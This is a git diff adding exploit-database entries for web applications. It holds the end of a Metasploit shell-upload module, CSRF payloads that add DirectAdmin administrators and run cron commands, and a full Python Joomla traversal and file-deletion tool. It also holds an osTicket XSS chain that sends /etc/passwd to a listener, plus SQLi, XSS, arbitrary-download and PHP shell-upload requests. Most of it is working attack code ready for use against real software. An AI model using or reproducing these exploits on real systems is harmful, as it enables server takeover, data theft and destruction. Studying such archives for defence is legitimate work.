+           cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
+           return cookie
+          end
+       else res.redirection.to_s.include?('admin/index.php')
+          fail_with(Failure::NoAccess, 'The account is the administrator. Please use a teacher account!')
+          return cookie
+       end
+    end
+
+    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
+    return nil
+  end
+##
+# Exploit controls and information
+##
+  def exploit
+    tcookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    print_good("Logged in as #{datastore['USERNAME']}")
+
+    if create_course(tcookie, true)
+      print_status("CSRF Token : " + @token)
+      print_status("Course Name : " + @course_name + " Course ID : " + @course_id)
+      print_good("New course successfully created.")
+    end
+
+    if upload_shell(tcookie, true)
+      print_good("Upload successfully.")
+      print_status("Trying to exec payload...")
+      exec_payload
+    end
+  end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/php/webapps/46694.txt b/exploits/php/webapps/46694.txt
new file mode 100644
index 000000000..1beebdb07
--- /dev/null
+++ b/exploits/php/webapps/46694.txt
@@ -0,0 +1,69 @@
+# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
+# Date: 12.04.2019
+# Author: InfinitumIT
+# Vendor Homepage: https://www.directadmin.com/
+# Version: Up to v1.561.
+# CVE: CVE-2019-11193
+# info@infinitumit.com.tr && infinitumit.com.tr
+
+# Description:
+# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by
+# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover.
+# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen:
+# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more.
+
+# Reflected XSS Vulnerabilities:
+# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
+
+# Example Payloads:
+# Add Administrator:
+var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
+l=test%40test.com&passwd=password&passwd2=password&notify=ye";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Remote Command Execution by Cron Jobs:
+var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
+var params =
+"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Edit File:
+var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
+var params = "file=the-file-full-path&action=save&text=new-content";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Create FTP Account:
+var url = "http://SERVERIP:2222/CMD_FTP";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
+&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
+stom_val=%2Fhome%2Fusername&create=Create";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+
+# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
+# InfinitumIT / For safer days...
\ No newline at end of file
diff --git a/exploits/php/webapps/46710.py b/exploits/php/webapps/46710.py
new file mode 100755
index 000000000..ed7221103
--- /dev/null
+++ b/exploits/php/webapps/46710.py
@@ -0,0 +1,180 @@
+# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
+# Date: 2019-March-13
+# Exploit Author: Haboob Team
+# Web Site: haboob.sa
+# Email: research@haboob.sa
+# Software Link: https://www.joomla.org/
+# Versions: Joomla 1.5.0 through Joomla 3.9.4
+# CVE : CVE-2019-10945
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
+#
+# Usage:
+#  List files in the specified directory:
+#  python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
+#
+#  Delete file in specified directory
+#  python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list>  --rm=<file name>
+
+
+import re
+import tempfile
+import pickle
+import os
+import hashlib
+import urllib
+
+try:
+    import click
+except ImportError:
+    print("module 'click' doesn't exist, type: pip install click")
+    exit(0)
+
+try:
+    import requests
+except ImportError:
+    print("module 'requests' doesn't exist, type: pip install requests")
+    exit(0)
+try:
+    import lxml.html
+except ImportError:
+    print("module 'lxml' doesn't exist, type: pip install lxml")
+    exit(0)
+
+mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."
+
+print ''' 
+# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
+# Web Site: Haboob.sa
+# Email: research@haboob.sa
+# Versions: Joomla 1.5.0 through Joomla 3.9.4
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945    
+ _    _          ____   ____   ____  ____  
+| |  | |   /\   |  _ \ / __ \ / __ \|  _ \ 
+| |__| |  /  \  | |_) | |  | | |  | | |_) |
+|  __  | / /\ \ |  _ <| |  | | |  | |  _ < 
+| |  | |/ ____ \| |_) | |__| | |__| | |_) |
+|_|  |_/_/    \_\____/ \____/ \____/|____/ 
+                                                                       
+'''
+class URL(click.ParamType):
+    name = 'url'
+    regex = re.compile(
+        r'^(?:http)s?://'  # http:// or https://
+        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
+        r'localhost|'  # localhost...
+        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
+        r'(?::\d+)?'  # optional port
+        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
+
+    def convert(self, value, param, ctx):
+        if not isinstance(value, tuple):
+            if re.match(self.regex, value) is None:
+                self.fail('invalid URL (%s)' % value, param, ctx)
+        return value
+
+
+def getForm(url, query, cookie=''):
+    r = requests.get(url, cookies=cookie, timeout=5)
+    if r.status_code != 200:
+        print("invalid URL: 404 NOT FOUND!!")
+        exit(0)
+    page = r.text.encode('utf-8')
+    html = lxml.html.fromstring(page)
+    return html.xpath(query), r.cookies
+
+
+def login(url, username, password):
+    csrf, cookie = getForm(url, '//input/@name')
+    postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
+                'return': 'aW5kZXgucGhw', csrf[-1]: 1}
+
+    res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
+    if res.status_code == 200:
+        html = lxml.html.fromstring(res.text)
+        msg = html.xpath("//div[@class='alert-message']/text()[1]")
+        print msg
+        exit()
+    else:
+        get_cookies(res.cookies.get_dict(), url, username, password)
+
+
+def save_cookies(requests_cookiejar, filename):
+    with open(filename, 'wb') as f:
+        pickle.dump(requests_cookiejar, f)
+
+
+def load_cookies(filename):
+    with open(filename, 'rb') as f:
+        return pickle.load(f)
+
+
+def cookies_file_name(url, username, password):
+    result = hashlib.md5(str(url) + str(username) + str(password))
+    _dir = tempfile.gettempdir()
+    return _dir + "/" + result.hexdigest() + ".Jcookie"
+
+
+def get_cookies(req_cookie, url, username, password):
+    cookie_file = cookies_file_name(url, username, password)
+    if os.path.isfile(cookie_file):
+        return load_cookies(cookie_file)
+    else:
+        save_cookies(req_cookie, cookie_file)
+        return req_cookie
+
+
+def traversal(url, username, password, dir=None):
+    cookie = get_cookies('', url, username, password)
+    url = url + mediaList + dir
+    files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
+    for file in files:
+        print file
+    pass
+
+
+def removeFile(baseurl, username, password, dir='', file=''):
+    cookie = get_cookies('', baseurl, username, password)
+    url = baseurl + mediaList + dir
+    link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
+    if link:
+        link = urllib.unquote(link[0].encode("utf8"))
+        link = link.split('folder=')[0]
+        link = link.replace("folder.delete", "file.delete")
+        link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
+        msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
+        if len(msg) == 0:
+            print "ERROR : File does not exist"
+        else:
+            print msg
+    else:
+        print "ERROR:404 NOT FOUND!!"
+
+
+@click.group(invoke_without_command=True)
+@click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
+@click.option('--username', type=str, help="Joomla Manager username", required=True)
+@click.option('--password', type=str, help="Joomla Manager password", required=True)
+@click.option('--dir', type=str, help="listing directory")
+@click.option('--rm', type=str, help="delete file")
+@click.pass_context
+def cli(ctx, url, username, password, dir, rm):
+    url = url+"/"
+    cookie_file = cookies_file_name(url, username, password)
+    if not os.path.isfile(cookie_file):
+        login(url, username, password)
+    if dir is not None:
+        dir = dir.lstrip('/')
+        dir = dir.rstrip('/')
+        dir = "/" + dir
+        if dir == "/" or dir == "../" or dir == "/.":
+            dir = ''
+    else:
+        dir = ''
+    print dir
+    if rm is not None:
+        removeFile(url, username, password, dir, rm)
+    else:
+        traversal(url, username, password, dir)
+
+
+cli()
\ No newline at end of file
diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt
new file mode 100644
index 000000000..98e9740d7
--- /dev/null
+++ b/exploits/php/webapps/46734.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Contact Form Builder [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-builder
+# Version: 1.0.67
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `ContactFormMakerPreview`
+- `ContactFormmakerwdcaptcha`
+- `nopriv_ContactFormmakerwdcaptcha`
+- `CFMShortcode`
+
+All of them call the function `contact_form_maker_ajax`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+PoC
+---
+
+```html
+<form method="post"
+action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
+    <label>AJAX action:
+        <select name="action">
+                <option
+value="ContactFormMakerPreview">ContactFormMakerPreview</option>
+                <option
+value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
+                <option
+value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
+                <option value="CFMShortcode">CFMShortcode</option>
+        </select>
+    </label>
+    <button type="submit" value="Submit">Submit</button>
+</form>
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/46738.html b/exploits/php/webapps/46738.html
new file mode 100644
index 000000000..31133a1de
--- /dev/null
+++ b/exploits/php/webapps/46738.html
@@ -0,0 +1,55 @@
+# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: http://www.74cms.com/download/index.html
+# Version: v5.0.1
+# CVE : CVE-2019-11374
+
+ 
+
+74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
+
+ 
+
+<!--poc.html(creat a administrater)-->
+
+<!DOCTYPE html>
+
+<html>
+
+  <head>
+
+  <title> CSRF Proof</title>
+
+  <script type="text/javascript">
+
+    function exec1(){
+
+      document.getElementById('form1').submit();
+
+    }
+
+  </script>
+
+  </head>
+
+  <body onload="exec1();">
+
+    <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
+
+      <input type="hidden" name="username" value="hacker1" />
+
+  <input type="hidden" name="email" value="111111111@qq.com" />
+
+      <input type="hidden" name="password" value="hacker1" />
+
+      <input type="hidden" name="repassword" value="hacker1" />  
+
+  <input type="hidden" name="role_id" value="1" />
+
+    </form>
+
+  </body>
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/46739.html b/exploits/php/webapps/46739.html
new file mode 100644
index 000000000..b19234bae
--- /dev/null
+++ b/exploits/php/webapps/46739.html
@@ -0,0 +1,68 @@
+# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information
+
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: https://www.msvodx.com/
+# Version: v10
+# CVE : CVE-2019-11375
+
+ 
+
+Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.
+
+ 
+
+<!--poc.html(change user infomation)-->
+
+<!DOCTYPE html>
+
+<html>
+
+  <head>
+
+  <title> CSRF Proof</title>
+
+  <script type="text/javascript">
+
+    function exec1(){
+
+      document.getElementById('form1').submit();
+
+    }
+
+  </script>
+
+  </head>
+
+  <body onload="exec1();">
+
+    <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">
+
+      <input type="hidden" name="username" value="hacker1" />
+
+  <input type="hidden" name="nickname" value="hacker1" />
+
+  <input type="hidden" name="email" value="hacker1" />
+
+  <input type="hidden" name="tel" value="hacker1" />
+
+      <input type="hidden" name="password" value="hacker1" />
+
+      <input type="hidden" name="out_time" value="1970-01-01" />  
+
+  <input type="hidden" name="money" value="30" />
+
+  <input type="hidden" name="is_permanent" value="0" />
+
+  <input type="hidden" name="status" value="1" />
+
+  <input type="hidden" name="id" value="821" />
+
+    </form>
+
+  </body>
+
+</html>
+
+MISC:http://www.iwantacve.cn/index.php/archives/198/
\ No newline at end of file
diff --git a/exploits/php/webapps/46741.txt b/exploits/php/webapps/46741.txt
new file mode 100644
index 000000000..ce87cd90c
--- /dev/null
+++ b/exploits/php/webapps/46741.txt
@@ -0,0 +1,43 @@
+# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://en.ulicms.de/
+# Version: 2019.2 , 2019.1
+# CVE : CVE-2019-11398
+
+### Vulnerability 1
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/loginform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result : <input type="hidden" name="go" value='asd' accesskey='X'
+onclick='alert(1)'>
+
+### Vulnerability 2
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/registerform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result : <input type="hidden" name="go" value='asd' accesskey='X'
+onclick='alert(1)'>
+
+### Vulnerability 3 - Authenticated
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+Request Type: GET
+Vulnerable Parameter : "error"
+Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+
+### History
+=============
+2019-04-13  Issue discovered
+2019-04-13  Vendor contacted
+2019-04-13  Vendor response and hotfix
+2019-04-14  Vendor releases fixed versions
+2019-04-22  Advisory release
\ No newline at end of file
diff --git a/exploits/php/webapps/46753.txt b/exploits/php/webapps/46753.txt
new file mode 100644
index 000000000..4c28e2184
--- /dev/null
+++ b/exploits/php/webapps/46753.txt
@@ -0,0 +1,107 @@
+# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File
+Inclusion
+# Date: 09.04.2019
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://osticket.com
+# Software Link: https://github.com/osTicket/osTicket
+# References: https://github.com/osTicket/osTicket/pull/4869
+#             https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html
+# Version: v1.11
+# Category: Webapps
+# Tested on: XAMPP for Linux
+# Description: This is exploit proof of concept as XSS attempt can
+# lead to an LFI (Local File Inclusion) attack at osTicket.
+##################################################################
+# PoC
+
+# There are two different XSS vulnerabilities in the "Import"
+field on the Agent Panel - User Directory field. This vulnerability
+causes a different vulnerability. The attacker can run the malicious
+JS file that he uploads in the XSS vulnerability. Uploaded JS files
+can be called clear text. Therefore, attackers do not have to use
+a different server to perform an attack. Then it is possible to
+create "Local File Inclusion" vulnerability too.
+
+The attacker can upload a JS file as follows.
+------------------------------------------------------------------
+
+function readTextFile(file)
+{
+    var rawFile = new XMLHttpRequest();
+    rawFile.open("GET", file, false);
+    rawFile.onreadystatechange = function ()
+    {
+        if(rawFile.readyState === 4)
+        {
+            if(rawFile.status === 200 || rawFile.status == 0)
+            {
+                var allText = rawFile.responseText;
+                allText.src = 'http://localhost:8001' +
+rawFile.responseText;
+                document.body.appendChild(allText);
+            }
+        }
+    }
+    rawFile.send(null);
+}
+
+readTextFile("/etc/passwd");
+
+------------------------------------------------------------------
+
+# Smilar JS File Link;
+
+/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm
+&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36"
+
+After this process, we can run the JS file in XSS vulnerability.
+
+
+# Our First Request for XSS to LFI;
+------------------------------------------------------------------
+
+POST /upload/scp/users.php?do=import-users
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------[]
+
+
+-----------------------------[]
+Content-Disposition: form-data; name="__CSRFToken__"
+
+8f6f85b8d76218112a53f909692f3c4ae7768b39
+-----------------------------[]
+Content-Disposition: form-data; name="pasted"
+
+
+-----------------------------[]
+Content-Disposition: form-data; name="import"; filename="users-20190408.csv"
+Content-Type: text/csv
+
+<script src="
+http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36
+"></script>
+
+-----------------------------[]--
+
+
+
+
+# Our Second Request for XSS to LFI;
+------------------------------------------------------------------
+POST /upload/scp/ajax.php/users/import HTTP/1.1
+Host: localhost
+
+__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users
+------------------------------------------------------------------
+
+
+# After sending XSS requests,
+# When the attacker listens to port 8001, he/she will receive a request as
+follows.
+
+root@AkkuS:~# python -m SimpleHTTPServer 8001
+Serving HTTP on 0.0.0.0 port 8001 ...
+127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 -
+127.0.0.1 - - [09/Apr/2019 11:54:42] "GET
+/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More]
\ No newline at end of file
diff --git a/exploits/php/webapps/46769.txt b/exploits/php/webapps/46769.txt
new file mode 100644
index 000000000..34cb7a6f8
--- /dev/null
+++ b/exploits/php/webapps/46769.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: April 27, 2019
+# Vendor Homepage: http://www.ari-soft.com
+# Software Link : https://extensions.joomla.org/extensions/extension/living/education-a-culture/ari-quiz/
+# Tested Version: 3.7.4
+# Tested on: Kali linux, Windows 8.1 
+
+
+# PoC:
+
+# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=SQLi&Itemid=236
+# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=6%27and%200%20union%20select%201,2,3--%20-&Itemid=236
\ No newline at end of file
diff --git a/exploits/php/webapps/46771.txt b/exploits/php/webapps/46771.txt
new file mode 100644
index 000000000..2f9e4feff
--- /dev/null
+++ b/exploits/php/webapps/46771.txt
@@ -0,0 +1,39 @@
+# Exploit Title: HumHub 1.3.12 - Cross-Site Scripting
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://humhub.org/
+# Version: 1.3.12
+# CVE : CVE-2019-11564
+
+
+Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
+Vulnerable File :
+/protected/vendor/codeception/codeception/tests/data/app/view/index.php
+Request Type: POST
+
+
+#Request Example:
+=============
+
+    POST /humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
+HTTP/1.1
+    Host: localhost
+    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/73.0.3683.83 Safari/537.36
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: en-US,en;q=0.5
+    Accept-Encoding: gzip, deflate
+    Referer: http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 64
+    Connection: close
+    Cookie: xxxx
+    Upgrade-Insecure-Requests: 1
+
+    %3Cscript%3Ealert%28%22Vulnerable%22%29%3C%2Fscript%3E=undefined
+
+### History
+=============
+2019-4-10  Issue discovered
+2019-4-10  Vendor contacted
+2019-4-10  Vendor response and hotfix
+2019-4-27  Advisory release
\ No newline at end of file
diff --git a/exploits/php/webapps/46774.txt b/exploits/php/webapps/46774.txt
new file mode 100644
index 000000000..c29e0c8ca
--- /dev/null
+++ b/exploits/php/webapps/46774.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: April 28, 2019
+# Vendor Homepage: http://www.isapp.it
+# Software Link : https://extensions.joomla.org/extensions/extension/search-a-indexing/site-search/jifile/
+# Dork: inurl:index.php?option=com_jifile
+# Tested Version: 2.3.1
+# Tested on: Kali linux, Windows 8.1 
+
+
+# PoC:
+
+
+GET /web/index.php?option=com_jifile&task=filesystem.download&filename=index.php HTTP/1.1  <== YOUR FILE HERE
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: 7a9abe45881a5cc968ac0e7c857d8a72=6a377b3429e0b0c22c3abb8f3a078534
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+HTTP/1.1 200 OK
+Date: Sun, 28 Apr 2019 17:37:16 GMT
+Server: Apache
+Pragma: public
+Cache-Control: must-revalidate, post-check=0, pre-check=0
+Expires: 0
+Content-Transfer-Encoding: binary
+Content-Disposition: attachment; filename="index.php"; modification-date="1418190008"; size=1319;
+Set-Cookie: c90ff18cda17f7cf5069ad1e830756c6=9a1f1c7e9bc241c66e7ad65ca0dd7624; path=/; secure
+Content-Length: 1319
+Connection: close
+Content-Type: application/x-php
+
+FILE_CONTENT
\ No newline at end of file
diff --git a/exploits/php/webapps/46776.txt b/exploits/php/webapps/46776.txt
new file mode 100644
index 000000000..3fb1bdee9
--- /dev/null
+++ b/exploits/php/webapps/46776.txt
@@ -0,0 +1,122 @@
+========================================================================================                  
+| Fleet Manager hyvikk Shell Upload
+  # Date: 29-04-2019
+  # Title    : Fleet Manager by hyvikk All versions                  
+| # Author   : saxgy1331  - Kaieteur-Falls-1331                                                                           
+| # Vendor Homepage:  https://codecanyon.net/item/fleet-manager/20051839                     
+| # Tested on: Windows, Linux 
+| # Bug      : Shell upload                                                                     
+======================  =================================
+ # Exploit  : 
+ 
+You can upload a php shell file as a vehicle image
+
+http://localhost/delivery/public/vehicles/create   
+
+After uploading the image you the shell will be saved in the /uploads/ folder with the id code 
+go  http://localhost/delivery/public/vehicles/ right click on the recent "php shell photo" you have uploaded Boom!
+
+POST /good/vehicles HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/good/vehicles/create
+Content-Type: multipart/form-data; boundary=---------------------------191691572411478
+Content-Length: 1926
+Connection: keep-alive
+Cookie: PHPSESSID= ; XSRF-TOKEN= %3D%3D; laravel_session= 
+Upgrade-Insecure-Requests: 1
+
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="_token"
+
+ 9gGkjP2AeqfijIpC6hH7TSxGDS7RAoily8pEdM9R
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="user_id"
+
+ 1
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="make"
+
+ test1234
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="model"
+
+ test12345
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="type"
+
+ Hatchback
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="year"
+
+ 5
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="int_mileage"
+
+ 3
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="vehicle_image"; filename="1331.php"
+ Content-Type: application/octet-stream
+
+ <?php
+ echo "1331";
+ ?>
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="reg_exp_date"
+
+ 2019-04-24
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="in_service"
+
+ 1
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="engine_type"
+
+ Petrol
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="horse_power"
+
+ 1
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="color"
+
+ green
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="vin"
+
+ 1
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="license_plate"
+
+ 1331
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="lic_exp_date"
+
+ 2019-04-23
+ -----------------------------191691572411478
+ Content-Disposition: form-data; name="group_id"
+
+ 1
+ -----------------------------191691572411478--
+ 
+ 
+Example  
+http://localhost/delivery/public/uploads/122030d1-ba55-4bfe-9533-44955d47b433.php  
+
+Fix
+
+public function uploadPhoto(Request $request)
+{
+    $this->validate($request, [
+        'photo' => 'mimes:jpeg,png,bmp,tiff |max:4096',
+    ],
+        $messages = [
+            'required' => 'The :attribute field is required.',
+            'mimes' => 'Only jpeg, png, bmp,tiff are allowed.'
+        ]
+    );
+ // Now save your file to the storage and file details at database.
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/46777.txt b/exploits/php/webapps/46777.txt
new file mode 100644
index 000000000..e17ed2c6b
--- /dev/null
+++ b/exploits/php/webapps/46777.txt
@@ -0,0 +1,33 @@
+################################
+# Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability
+# Google Dork: n/a
+# Date: 26/11/2018
+# Exploit Author: n4pst3r
+# Vendor Homepage: unkn0wn
+# Software Link: http://www.agenttesla.com/ ¡ Down !
+# Version: unkn0wn
+# Tested on: Windows 10, debian 7
+# CVE : n/a
+# Greetz: Shell.root, Griever, Telibles
+################################
+# Vuln-Code: http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php
+
+$table = $_GET['table'];
+
+// Table's primary key
+$primaryKey = $_GET['primary'];
+
+if(isset($_GET['where'])){
+	$where = base64_decode($_GET['where']);
+}else{
+	$where = "";
+}
+
+$idArray = unserialize(urldecode($_GET['clmns']));
+
+################################
+PoC Extract full passwords:
